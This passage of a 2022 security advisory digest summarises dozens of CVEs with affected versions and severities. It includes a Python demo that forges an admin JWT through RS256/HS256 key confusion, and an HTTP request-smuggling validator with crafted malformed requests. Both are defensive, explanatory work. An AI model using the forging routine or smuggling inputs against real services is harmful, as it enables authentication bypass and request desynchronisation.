products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-32546 (High), CVE-2022-32547 (High), CVE-2022-32545 (High),
CVE-2022-31799 (Critical), CVE-2022-2129 (High), CVE-2022-33070 (Medium)
Multiple vulnerabilities have been discovered in Nuki (smart lock) products. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-32509 (High), CVE-2022-32504 (High), CVE-2022-32502 (High),
CVE-2022-32507 (High), CVE-2022-32503 (High), CVE-2022-32510 (High), CVE-2022-32506
(Medium), CVE-2022-32508 (Medium), CVE-2022-32505 (Medium)
FileWave has released security updates to address an authentication bypass and a hard-coded
cryptographic key vulnerability in FileWave's mobile device management (MDM) system. The
affected versions are FileWave MDM before version 14.6.3, and 14.7.x prior to 14.7.2.
CVE ID: CVE-2022-34907 (Critical), CVE-2022-34906 (Critical)
It has been discovered that Dataease contains a SQL injection vulnerability via the
parameter dataSourceId. The affected version is Dataease v1.11.1.
CVE ID: CVE-2022-34115 (Critical)
It has been discovered that the package convert-svg-core is vulnerable to Remote Code
Injection via sending an SVG file containing the payload. The affected versions are
convert-svg-core before 0.6.2.
CVE ID: CVE-2022-25759 (Critical)
It has been discovered that Nginx NJS contains an out-of-bounds read vulnerability via
njs_scope_value at njs_scope.h. The affected version is Nginx NJS v0.7.4.
CVE ID: CVE-2022-34029 (Critical)
It has been discovered that UNIT4 TETA Mobile Edition (ME) contains a SQL injection
vulnerability via the ProfileName parameter in the errorReporting page. The affected version
is UNIT4 TETA Mobile Edition (ME) before 29.5.HF17.
CVE ID: CVE-2022-27434 (Critical)
A vulnerability has been discovered in the ContentResource API of dotCMS. This vulnerability
allows an unauthenticated attacker to upload an executable file, such as a .jsp file, that
can lead to remote code execution. The affected versions are dotCMS 3.0 through 22.02.
CVE ID: CVE-2022-26352 (Critical)
It has been discovered that the Scoptrial package in PyPI contains a code execution backdoor
vulnerability via the request package. This vulnerability allows attackers to access
sensitive user information and digital currency keys, as well as escalate privileges. The
affected version is v0.0.5 of the Scoptrial package in PyPI.
CVE ID: CVE-2022-34057 (Critical)
It has been discovered that libnx_apl.so on Nexans FTTO GigaSwitch implements a backdoor
account for SSH logins on port 50200 or 50201. The affected versions are Nexans FTTO
GigaSwitch before 6.02N and 7.x before 7.02.
CVE ID: CVE-2022-32985 (Critical)
Skyhigh has released security updates to address Authentication Bypass, and Improper
Neutralization of Special Elements in Output Used by a Downstream Component vulnerabilities
in Secure Web Gateway (SWG). The affected versions are SWG 11.x earlier than 11.2.1, SWG
10.x earlier than 10.2.12, SWG 9.x earlier than 9.2.23, and SWG 8.x earlier than 8.2.28.
CVE ID: CVE-2022-2310 (Critical), CVE-2022-34914 (Critical)
Ubuntu has released security updates to address a vulnerability in PHP. A remote attacker
can use this vulnerability to cause PHP to crash, resulting in a denial of service, or
possibly execute arbitrary code. The affected product is Ubuntu 22.04 LTS.
CVE ID: CVE-2022-31627
Multiple vulnerabilities, including sensitive information disclosure and unauthorized
setting changes, have been discovered in the Transposh WordPress Translation plugin for
WordPress. The affected versions are Transposh WordPress Translation versions up to, and
including, 1.0.8.1.
CVE ID: CVE-2022-2462 (Medium), CVE-2022-2461 (Medium)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
It has been discovered that Barangay Management System contains a SQL injection
vulnerability via the hidden_id parameter at /officials/officials.php. The affected version
is Barangay Management System v1.0.
CVE ID: CVE-2022-34023 (Critical)
A vulnerability has been discovered in Poly EagleEye Director II. Existence of a certain
file (which can be created via an rsync backdoor) causes all API calls to execute as admin
without authentication. The affected versions are Poly EagleEye Director II before 2.2.2.1.
CVE ID: CVE-2022-26479 (Critical)
Roxy-WI has released a security update to address a vulnerability that allows system
commands to be run remotely via the subprocess_execute function without processing the
inputs received from the user in the /app/options.py file. The affected versions are Roxy-WI
prior to version 6.1.1.0. Roxy-WI version 6.1.1.0 contains a patch for this vulnerability.
CVE ID: CVE-2022-31161 (Critical)
A heap-based buffer over-read vulnerability has been discovered in Mbed TLS. This
vulnerability can cause a server crash or possibly information disclosure based on error
responses. The affected versions are Mbed TLS before 2.28.2 and 3.x before 3.2.0.
CVE ID: CVE-2022-35409 (Critical)
A heap-based buffer overflow vulnerability has been discovered in sqbaselib.cpp in SQUIRREL
due to the lack of a certain sq_reservestack call. The affected version is SQUIRREL 3.2.
CVE ID: CVE-2022-30292 (Critical)
It has been discovered that lrzip contains a heap memory corruption vulnerability via the
component lrzip.c:initialise_control. The affected version is lrzip v0.640.
CVE ID: CVE-2022-28044 (Critical)
A stored Cross-Site Scripting vulnerability has been discovered in the Stockists Manager for
Woocommerce and Simple Banner WordPress plugins. A security update is available for the
Simple Banner WordPress plugin. No patches are available for the Stockists Manager for
Woocommerce WordPress plugin.
CVE ID: CVE-2022-2518 (High), CVE-2022-2515 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
SonicWall has released security updates to address a SQL injection vulnerability. The
affected products are SonicWall GMS 9.3.1-SP2-Hotfix1 and earlier versions, and Analytics
On-Prem 2.5.0.3-2520 and earlier versions.
CVE ID: CVE-2022-22280 (Critical)
Open-Xchange has released security updates to address multiple vulnerabilities in its OX App
Suite products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-23100 (High), CVE-2022-23099 (Low), CVE-2021-42550, CVE-2022-23101
(Medium), CVE-2022-24405 (High), CVE-2022-24406 (Medium)
Dell has released security updates to address a third-party component (Polkit) vulnerability
in Dell Disk Library for mainframe (DLm). The affected versions are Models DLm8500 and DLm
2500 running DLm versions before 5.5.0.0.
CVE ID: CVE-2021-4034 (High)
Dell has released security updates to address an Improper Handling of Insufficient
Permissions or Privileges vulnerability in Dell EMC NetWorker. The affected versions are
Dell EMC NetWorker 19.2.1.x, 19.3.x, 19.4.x, 19.5.x, 19.6.x, and 19.7.0.0.
Google Chrome has released Beta channel 104.0.5112.57 (Platform version: 14909.79.0) for
most ChromeOS devices, Dev channel 105.0.5191.0 for Mac and Windows & 105.0.5191.2 for
Linux, and Chrome Dev 105 (105.0.5190.2) for Android.
Johnson Controls has released security updates to address a vulnerability impacting Metasys
ADS/ADX/OAS with MUI that allows an unauthenticated user to access the Metasys ADS/ADX/OAS
with MUI web API and enumerate users. The affected products are all Metasys ADS/ADX/OAS 10
and 11 versions with MUI.
CVE ID: CVE-2021-36200
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Rockwell Automation has released security updates to resolve deserialization of untrusted
data and path traversal vulnerabilities in Rockwell Automation's ISaGRAF Workbench equipment
that can result in directory traversal, privilege escalation, and arbitrary code execution.
CVE ID: CVE-2022-2463 (Medium), CVE-2022-2464 (High), CVE-2022-2465
(High)
ABB has released security updates to address an improper privilege management vulnerability
in ABB's Drive Composer, Automation Builder and Mint Workbench equipment. Successful
exploitation can allow Remote Code Execution. The affected products are ABB Drive Composer
Entry versions 2.0 to 2.7, ABB Drive Composer Pro versions 2.0 to 2.7, ABB Automation
Builder versions 1.1.0 to 2.5.0, and Mint Workbench builds 5866 and prior.
CVE ID: CVE-2022-31216 (High), CVE-2022-31217 (High), CVE-2022-31218 (High),
CVE-2022-31219 (High), CVE-2022-26057 (Medium)
A session hijacking vulnerability has been discovered in Inductive Automation Ignition
before 7.9.20 and 8.x before 8.1.17.
CVE ID: CVE-2022-35890 (Critical)
A Server-Side Request Forgery (SSRF) vulnerability via the whois lookup tool has been
discovered in Best Practical's RT for Incident Response (RTIR). The affected versions are
RTIR before 4.0.3 and 5.x before 5.0.3.
CVE ID: CVE-2022-25800 (Critical)
It has been discovered that the Android exported attribute is used to set third-party app
access permissions, and the default value for a component with an intent-filter is true.
com.sprd.firewall has set exported as true. Product: Android. Versions: Android SoC. Android
ID: A-231911916. Security updates are available.
CVE ID: CVE-2022-20216 (Critical)
It has been discovered that the Altra UEFI reference design allows insecure access to
SPI-NOR by the OS/hypervisor component. The affected versions are Ampere Altra and AltraMax
devices before SRP 1.09.
CVE ID: CVE-2022-32295 (Critical)
A vulnerability has been discovered in IOBit IOTransfer which can cause data theft and
Remote Code Execution (RCE). The affected version is IOBit IOTransfer 4.3.1.1561.
CVE ID: CVE-2022-24562 (Critical)
An improper access control vulnerability has been discovered in SonicWall SMA1000 series
firmware 12.4.0, 12.4.1-02965 and earlier versions.
CVE ID: CVE-2022-22282 (Critical)
AutomationDirect has released security updates to address a cleartext transmission of
sensitive information vulnerability in AutomationDirect's Stride Field I/O equipment that
can allow an attacker to obtain user credentials.
CVE ID: CVE-2022-2485 (Critical)
Apple has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Google Chrome has released Dev channel 105.0.5187.0 (Platform version: 14985.0.0) for most
ChromeOS devices, Chrome Beta 104 (104.0.5112.54) for iOS, Extended Stable channel
102.0.5005.167 for Windows and Mac, Beta channel 104.0.5112.57 for Windows, Mac and Linux,
and Chrome Beta 104 (104.0.5112.55) for Android.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A Local File Inclusion (LFI) vulnerability has been discovered in the component
codemirror.php of Portal do Software Publico Brasileiro i3geo v7.0.5 that allows attackers
to execute arbitrary PHP code via a crafted HTTP request.
CVE ID: CVE-2022-32409 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Verizon 5G Home LVSKIHP
InDoorUnit (IDU) 3.4.66.162.
CVE ID: CVE-2022-28369 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Verizon 5G Home LVSKIHP
OutDoorUnit (ODU) 3.33.101.0.
CVE ID: CVE-2022-28375 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Verizon 5G Home LVSKIHP
InDoorUnit (IDU) 3.4.66.162.
CVE ID: CVE-2022-28373 (Critical)
A Server-Side Request Forgery (SSRF) vulnerability via scripted action tools has been
discovered in Best Practical's RT for Incident Response (RTIR). The affected versions are
RTIR before 4.0.3 and 5.x before 5.0.3.
CVE ID: CVE-2022-25801 (Critical)
Argo CD has released security updates to address an improper certificate validation
vulnerability, which can cause Argo CD to trust a malicious OpenID Connect (OIDC) provider.
The affected versions are Argo CD from 0.4.0 up to, but not including, 2.2.11, 2.3.6 and
2.4.5. Security updates are available in Argo CD versions 2.4.5, 2.3.6, and 2.2.11.
CVE ID: CVE-2022-31105 (Critical)
Atlassian has released security updates to address Servlet Filter Dispatcher vulnerabilities
in its products.
CVE ID: CVE-2022-26136 (Critical), CVE-2022-26137 (Critical)
Atlassian has released security updates to address a vulnerability in Questions For
Confluence app for Confluence Server, and Confluence Data Center. The affected versions are
Questions for Confluence 2.7.34, 2.7.35, and Questions for Confluence 3.0.2.
CVE ID: CVE-2022-26138 (Critical)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system. Cisco will not release security updates to address the vulnerabilities in Cisco
Small Business RV110W, RV130, RV130W, and RV215W Routers as they have entered the
end-of-life process.
Drupal has released security updates to address multiple vulnerabilities in Drupal Core.
CVE ID: CVE-2022-25276, CVE-2022-25277 (Critical), CVE-2022-25278, CVE-2022-25275
Ubuntu has released security updates to address a vulnerability in PyJWT, which incorrectly
handled signatures constructed from SSH public keys. A remote attacker could use this
vulnerability to forge a JWT signature. The affected products are Ubuntu 22.04 LTS, Ubuntu
20.04 LTS and Ubuntu 18.04 LTS.
CVE ID: CVE-2022-29217 (High)
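The underlying problem is a key/algorithm confusion: a verifier that accepts both RS256 and HS256 with the same key object can be tricked into treating the service's public key (which the attacker can know) as an HMAC secret. The following is an added example, not PyJWT's code or the Ubuntu advisory's, showing a minimal HS256 signer and verifier in pure Python; the OpenSSH-formatted key string is a constructed placeholder, and the `looks_like_public_key` check is an illustrative reconstruction of the fix's approach (rejecting obvious asymmetric key material when it is offered as an HMAC secret), not PyJWT's actual implementation.

```python
import base64
import hashlib
import hmac
import json

# Constructed sample: an OpenSSH-formatted RSA public key such as a service
# might load to verify RS256 tokens. The key body is a placeholder, not a
# real key; only its "ssh-rsa " format matters for this example.
SSH_PUBLIC_KEY = b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0examplekeybody== deploy@example"


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Build a JWT signed with HMAC-SHA256. An attacker who knows the
    service's public key can call this with that key as the secret."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        _b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(sig)


def looks_like_public_key(key: bytes) -> bool:
    """Illustrative check (assumption, not PyJWT's code): refuse any PEM block
    or OpenSSH-formatted key when it is offered as an HMAC secret."""
    stripped = key.strip()
    if stripped.startswith(b"-----BEGIN"):
        return True
    key_type = stripped.split(b" ", 1)[0]
    return key_type in (b"ssh-rsa", b"ssh-ed25519", b"ssh-dss",
                        b"ecdsa-sha2-nistp256", b"ecdsa-sha2-nistp384",
                        b"ecdsa-sha2-nistp521")


def verify(token: str, key: bytes, allowed_algs: set,
           *, reject_public_keys: bool) -> dict:
    """Verify a token. Only the HMAC path is implemented; RS256 would need an
    RSA library and is not what the confusion attack exercises."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    alg = json.loads(_b64url_decode(header_b64)).get("alg")
    if alg not in allowed_algs:
        raise ValueError(f"algorithm {alg!r} not allowed")
    if alg == "HS256":
        if reject_public_keys and looks_like_public_key(key):
            raise ValueError("public key material cannot be an HMAC secret")
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            raise ValueError("bad signature")
        return json.loads(_b64url_decode(payload_b64))
    raise NotImplementedError(f"{alg} verification not implemented here")


def token_accepted(token: str, key: bytes, allowed_algs: set,
                   reject_public_keys: bool) -> bool:
    try:
        verify(token, key, allowed_algs, reject_public_keys=reject_public_keys)
        return True
    except ValueError:
        return False


def forged_token_accepted(reject_public_keys: bool) -> bool:
    """Attacker forges an admin token using the public key as HMAC secret and
    presents it to a verifier that accepts both RS256 and HS256."""
    forged = sign_hs256({"sub": "admin"}, SSH_PUBLIC_KEY)
    return token_accepted(forged, SSH_PUBLIC_KEY, {"RS256", "HS256"},
                          reject_public_keys)


if __name__ == "__main__":
    print("lax verifier accepts forged token:", forged_token_accepted(False))
    print("hardened verifier accepts forged token:", forged_token_accepted(True))
```

The more robust fix on the application side is to pin `allowed_algs` to the single algorithm the service actually uses, so that a token carrying a different `alg` is rejected before any key is consulted; the key-format check is a defence in depth for deployments that cannot do that.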
Oracle Solaris has released security updates to address multiple vulnerabilities in third
party software that is included in Oracle Solaris distributions.
Accusoft has released a security update to address a use-after-free vulnerability in
Accusoft ImageGear PSD Header. This vulnerability can lead to out-of-bounds heap writes,
which can cause memory corruption and code execution. The affected version is Accusoft
ImageGear 19.10.
CVE ID: CVE-2022-29465
Oracle has released its critical patch update for July 2022 to address 349 vulnerabilities
across multiple products. An attacker can exploit these vulnerabilities to take control of
an affected system.
Dahua has released security updates to address multiple vulnerabilities in its
DHI-ASI7213X-T1 and related equipment that can allow unauthorized access, upload of
malicious files, and a Denial of Service (DoS) condition. The affected products are Dahua
ASI7XXX versions prior to v1.000.0000009.0.R.220620, Dahua IPC-HDBW2XXX versions prior to
v2.820.0000000.48.R.220614 and Dahua IPC-HX2XXX versions prior to
v2.820.0000000.48.R.220614.
CVE ID: CVE-2022-30560 (High), CVE-2022-30561 (Medium), CVE-2022-30562 (Low),
CVE-2022-30563 (Medium)
WordPress has released security updates to resolve a Stored Cross-Site Scripting
vulnerability via the 'templates[browsingpage]' parameter in the WP-UserOnline plugin. The
affected versions are WP-UserOnline versions up to, and including, 2.87.6.
CVE ID: CVE-2022-2473 (Medium)
Dell has released security updates to address several vulnerabilities in Dell products. The
affected products are Dell Connectrix (Brocade), Dell SmartFabric Storage Software, Dell
Connectrix (Cisco) DCNM and NDFC, and Dell Connectrix (Cisco) MDS DCNM.
Google Chrome has released Stable channel 103.0.5060.132 (Platform version: 14816.131.0) for
most ChromeOS devices and Stable channel 103.0.5060.134 for Windows, Mac and Linux to
resolve multiple vulnerabilities.
CVE ID: CVE-2022-2477 (High), CVE-2022-2478 (High), CVE-2022-2479 (High),
CVE-2022-2480 (High), CVE-2022-2481 (High), CVE-2022-2163 (Low)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that a Digiwin BPM function has insufficient validation of user
input. An unauthenticated remote attacker can inject arbitrary SQL commands to access,
modify or delete the database, or disrupt services.
CVE ID: CVE-2022-32456 (Critical)
A vulnerability has been discovered in the PeopleSoft Enterprise PeopleTools product of
Oracle PeopleSoft. Successful exploitation can result in takeover of PeopleSoft Enterprise.
The affected versions are PeopleSoft Enterprise PeopleTools 8.58 and 8.59.
CVE ID: CVE-2022-21543 (Critical)
A vulnerability has been discovered in Itech Auction Script that can be exploited
remotely. The affected version is Itech Auction Script 6.49.
CVE ID: CVE-2017-20138 (Critical)
A SQL injection vulnerability has been discovered in seminars (aka Seminar Manager)
extension through 4.1.3 for TYPO3.
CVE ID: CVE-2022-29601 (Critical)
A SQL injection vulnerability has been discovered in oelib (aka One is Enough Library)
extension through 4.1.5 for TYPO3.
CVE ID: CVE-2022-29600 (Critical)
A permission assignment vulnerability has been discovered in Application Security module of
HarmonyOS that can affect data integrity and confidentiality.
CVE ID: CVE-2022-34737 (Critical)
A misconfigured file permission vulnerability has been discovered in netaddr gem before
version 2.0.4 which can result in 0777 permissions in the target filesystem.
CVE ID: CVE-2019-17383 (Critical)
Multiple vulnerabilities have been discovered in the MiCODUS MV720 GPS tracker.
Successful exploitation can give an attacker control over any MV720 GPS tracker, granting
access to location and routes, fuel cutoff commands, and the disarming of various features
(e.g., alarms).
CVE ID: CVE-2022-2107 (Critical), CVE-2022-2141 (Critical), CVE-2022-2199 (High),
CVE-2022-34150 (High), CVE-2022-33944 (Medium)
Mitsubishi Electric has released security updates to address multiple vulnerabilities in its
GENESIS64 and MC Works64 equipment which can cause information disclosure, a Denial of
Service (DoS) condition or Remote Code Execution (RCE).
CVE ID: CVE-2022-29834 (High), CVE-2022-33315 (High), CVE-2022-33316 (High),
CVE-2022-33317 (High), CVE-2022-33318 (Critical), CVE-2022-33319 (High), CVE-2022-33320
(High)
Zyxel has released security updates to address privilege escalation, and authenticated
directory traversal vulnerabilities in its products.
CVE ID: CVE-2022-30526, CVE-2022-2030
Veritas has released security updates to address multiple vulnerabilities in NetBackup
OpsCenter. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-36954 (Critical), CVE-2022-36951 (Critical), CVE-2022-36950
(Critical), CVE-2022-23457 (Critical), CVE-2022-36949 (Critical), CVE-2022-36952 (High),
CVE-2022-36948 (Medium), CVE-2022-36953 (Medium)
Grails has released security updates to address a Remote Code Execution (RCE) vulnerability
in Grails framework. This vulnerability allows an attacker to remotely execute code within a
Grails application runtime by issuing a specially crafted web request that grants the
attacker access to the class loader.
CVE ID: CVE-2022-35912 (Critical)
A Remote Code Execution (RCE) vulnerability via the function parserIfLabel at function.php
has been discovered in PbootCMS. The affected version is PbootCMS v3.1.2.
CVE ID: CVE-2022-32417 (Critical)
It has been discovered that Apache CloudStack has a SAML 2.0 authentication Service Provider
plugin which is vulnerable to XML external entity (XXE) injection. The affected versions are
Apache CloudStack version 4.5.0 and later.
CVE ID: CVE-2022-35741 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Ubuntu has released security updates to resolve multiple vulnerabilities in WebKitGTK Web &
JavaScript engines that can cause Cross Site Scripting (XSS) attacks, Denial of Service
(DoS) attacks, and arbitrary code execution. The affected products are Ubuntu 22.04 LTS &
Ubuntu 20.04 LTS.
CVE ID: CVE-2022-26710, CVE-2022-22677
Ubuntu has released security updates to address a vulnerability in the libhttp-daemon-perl
package that can lead to HTTP request smuggling. The affected products are Ubuntu 16.04
ESM and Ubuntu 14.04 ESM.
CVE ID: CVE-2022-31081 (Medium)
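Request smuggling arises when two hops disagree about where a request body ends, so a server-side HTTP parser must reject any request head whose framing is ambiguous. The following is an added example, not the libhttp-daemon-perl code or the Ubuntu advisory's, showing the framing checks a listener should enforce (conflicting Content-Length values, non-numeric lengths, Transfer-Encoding combined with Content-Length, obsolete line folding and whitespace before the colon); the sample requests are constructed for the example, not captured traffic.

```python
class FramingError(ValueError):
    """Raised when a request head is ambiguous about its body length."""


# Constructed sample requests (not captured traffic).
CLEAN = (b"POST /login HTTP/1.1\r\nHost: example.test\r\n"
         b"Content-Length: 5\r\n\r\nab=cd")
DUPLICATE_SAME_CL = (b"POST /login HTTP/1.1\r\nHost: example.test\r\n"
                     b"Content-Length: 5, 5\r\n\r\nab=cd")
CONFLICTING_CL = (b"POST /login HTTP/1.1\r\nHost: example.test\r\n"
                  b"Content-Length: 5\r\nContent-Length: 30\r\n\r\nab=cd")
TE_AND_CL = (b"POST /login HTTP/1.1\r\nHost: example.test\r\n"
             b"Transfer-Encoding: chunked\r\nContent-Length: 5\r\n\r\n0\r\n\r\n")
BAD_CL_VALUE = (b"POST /login HTTP/1.1\r\nHost: example.test\r\n"
                b"Content-Length: +5\r\n\r\nab=cd")


def _parse_headers(head: bytes):
    """Split a request head into (request_line, [(lower_name, value), ...]),
    rejecting syntax that intermediaries are known to interpret differently."""
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        if line[:1] in (b" ", b"\t"):
            raise FramingError("obsolete line folding is not accepted")
        name, sep, value = line.partition(b":")
        if not sep or not name or name != name.rstrip():
            raise FramingError(f"malformed header field: {line!r}")
        headers.append((name.lower(), value.strip()))
    return lines[0], headers


def request_framing(raw: bytes) -> dict:
    """Return how the body is delimited, or raise FramingError if the head
    could be read two ways."""
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise FramingError("incomplete request head")
    _request_line, headers = _parse_headers(head)

    te_values = [v for n, v in headers if n == b"transfer-encoding"]
    cl_values = []
    for name, value in headers:
        if name == b"content-length":
            # A comma-separated list is the same as repeated fields.
            cl_values.extend(part.strip() for part in value.split(b","))

    if te_values and cl_values:
        raise FramingError("Transfer-Encoding and Content-Length both present")
    if te_values:
        codings = [c.strip().lower() for v in te_values for c in v.split(b",")]
        if codings[-1] != b"chunked":
            raise FramingError("final transfer-coding is not chunked")
        return {"framing": "chunked", "length": None}
    if cl_values:
        if len(set(cl_values)) != 1:
            raise FramingError(f"conflicting Content-Length values: {cl_values}")
        if not cl_values[0].isdigit():  # ASCII digits only; rejects "+5", " 5x"
            raise FramingError(f"invalid Content-Length: {cl_values[0]!r}")
        return {"framing": "content-length", "length": int(cl_values[0])}
    return {"framing": "none", "length": 0}


def is_unambiguous(raw: bytes) -> bool:
    try:
        request_framing(raw)
        return True
    except FramingError:
        return False


if __name__ == "__main__":
    for label, req in [("clean", CLEAN), ("conflicting", CONFLICTING_CL),
                       ("te+cl", TE_AND_CL), ("bad value", BAD_CL_VALUE)]:
        print(f"{label:12s} accepted={is_unambiguous(req)}")
```

Rejecting with a 400 and closing the connection is the safe response: silently picking one of the conflicting values is exactly what lets a front-end and back-end desynchronise.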
WordPress has released security updates to resolve a deserialization of untrusted input
vulnerability via the 'fts_url' parameter in the Feed Them Social – for Twitter feed, Youtube
and more plugin. The affected versions are Feed Them Social – for Twitter feed, Youtube &
more versions up to, and including, 2.9.8.5.
CVE ID: CVE-2022-2437 (High)
Dell has released security updates to address several vulnerabilities in multiple
third-party components. The affected products are various versions of Dell Avamar Server
Hardware Appliance Gen4S and Gen4T, Dell Avamar Virtual Edition, Dell Avamar NDMP
Accelerator, Dell Avamar VMware Image Proxy, Dell NetWorker Virtual Edition (NVE), Dell
PowerProtect DP Series Appliance and Dell Integrated Data Protection Appliance (IDPA).
Google has released LTC (Long Term Support Candidate) channel 102.0.5005.153 (Platform
Version: 14695.114.0) for most ChromeOS devices to resolve multiple vulnerabilities.
CVE ID: CVE-2022-2156 (Critical), CVE-2022-2294 (High), CVE-2021-30560 (Medium),
CVE-2022-29824 (Medium)
Multiple critical vulnerabilities in the CODESYS V3 runtime affect Festo controller CECC
products. An attacker can exploit these vulnerabilities to take control of an affected
system. Security updates are available for some products.
CVE ID: CVE-2021-33485 (Critical), CVE-2020-10245 (Critical), CVE-2019-13548
(Critical), CVE-2019-18858 (Critical), CVE-2018-10612 (Critical), CVE-2019-9010 (Critical)
SonicWall has released security updates to address a Remote Code Execution (RCE)
vulnerability in SonicWall Switch and an improperly implemented security check vulnerability
in the SonicWall Hosted Email Security. The affected products are SonicWall Switch version
1.1.1.0-2s and earlier and SonicWall Hosted Email Security 10.0.17.7319 and earlier
versions.
CVE ID: CVE-2022-2323 (High), CVE-2022-2324 (High)
It has been discovered that Zimbra Collaboration Open Source does not encrypt the randomly
generated initial-login password, which is visible in cleartext on UDP port 514 (the syslog
port). The affected version is Zimbra Collaboration Open Source 8.8.15.
CVE ID: CVE-2022-32294 (Critical)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates for
some products are available.
CVE ID: CVE-2021-33473 (Critical), CVE-2021-37404 (Critical), CVE-2022-1678 (High),
CVE-2022-1882 (High), CVE-2022-2097 (Low), CVE-2022-2274 (High), CVE-2022-29824 (Medium),
CVE-2022-29968 (High), CVE-2022-32250 (High), CVE-2022-32275 (High), CVE-2022-24735 (High),
CVE-2022-24736 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
ABB has released security updates to address a path traversal vulnerability in the
implementation of the Totalflow TCP protocol in ABB G5 products. Successful exploitation of
this vulnerability can lead to root access.
CVE ID: CVE-2022-0902 (High)
Multiple out of bounds read vulnerabilities have been discovered in Open Design Alliance's
Drawings SDK. Successful exploitation requires a user to open a malicious DWG file, which
can lead to the application crashing or to arbitrary code execution.
CVE ID: CVE-2022-28807 (High), CVE-2022-28808 (High), CVE-2022-28809 (High)
Dell has released a security update to address Cross-Site Request Forgery (CSRF) and Java
stack overflow vulnerabilities in Dell Data Protection Central that can lead to processing
of unintended server operations. The affected products are Dell Data Protection Central
versions 19.1, 19.2, 19.3, 19.4, 19.5, and 19.6.
CVE ID: CVE-2022-34367 (Medium), CVE-2020-36518 (High)
Google Chrome has released Dev channel 105.0.5176.3 for Windows, Mac and Linux, Chrome Beta
104 (104.0.5112.48) for iOS, and Chrome Dev 105 (105.0.5176.0) for Android.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Ubuntu has released security updates to address multiple vulnerabilities in Linux kernel
that can cause a Denial of Service (DoS) or execute arbitrary code.
CVE ID: CVE-2022-1975, CVE-2022-1974, CVE-2022-1734 (High), CVE-2022-0500 (High),
CVE-2022-33981 (Low), CVE-2022-1789 (Medium)
The Hertzbleed vulnerability in AMD processors affects multiple F5 products and may allow
an authenticated attacker to perform a timing attack that could lead to information
disclosure.
CVE ID: CVE-2022-23823 (Medium)
The Hertzbleed vulnerability in Intel(R) processors affects multiple F5 products and may
allow an authenticated attacker with network access to potentially obtain information
disclosure.
CVE ID: CVE-2022-24436 (Medium)
Juniper Networks has released security updates to address multiple vulnerabilities affecting
its products. An attacker can exploit some of these vulnerabilities to take control of an
affected system.
It has been discovered that Netwrix Auditor is vulnerable to an insecure object
deserialization issue that is caused by an unsecured .NET remoting service. Successful
exploitation can cause Remote Code Execution (RCE) on Netwrix Auditor servers. The affected
versions are all supported versions of Netwrix Auditor prior to 10.5.
Drupal has released security update to address Remote Code Execution, and Information
disclosure vulnerabilities in dompdf/dompdf third-party dependency that affects the Entity
Print module. The affected versions are dompdf/dompdf versions below 2.0.0.
Cisco has released a security update to address an authentication bypass vulnerability in
Cisco Identity Services Engine (ISE). Successful exploitation can allow an unauthenticated,
remote attacker to log in without credentials and access all roles without any restrictions.
CVE ID: CVE-2022-20733 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates for
some products are available.
CVE ID: CVE-2022-1183 (High), CVE-2022-1734 (High), CVE-2022-1998 (High),
CVE-2022-2068 (Medium), CVE-2022-23712 (High), CVE-2018-10237 (Medium), CVE-2022-22970
(High), CVE-2022-27778 (High), CVE-2022-27779 (Medium), CVE-2022-27780 (Medium),
CVE-2022-27781 (Medium), CVE-2022-27782 (Medium), CVE-2022-30115 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2021-46141, CVE-2021-46142, CVE-2022-2319, CVE-2022-2320, CVE-2022-34903
Citrix has released security updates to resolve vulnerabilities that affect Citrix
Hypervisor, when running on AMD Zen 1 or AMD Zen 2 CPUs.
CVE ID: CVE-2022-23825, CVE-2022-29900
Microsoft has released security updates to address an elevation of privilege vulnerability
in the Windows Client Server Runtime Subsystem (CSRSS) affecting multiple Windows products
that can allow an attacker to gain SYSTEM privileges.
CVE ID: CVE-2022-22047 (High)
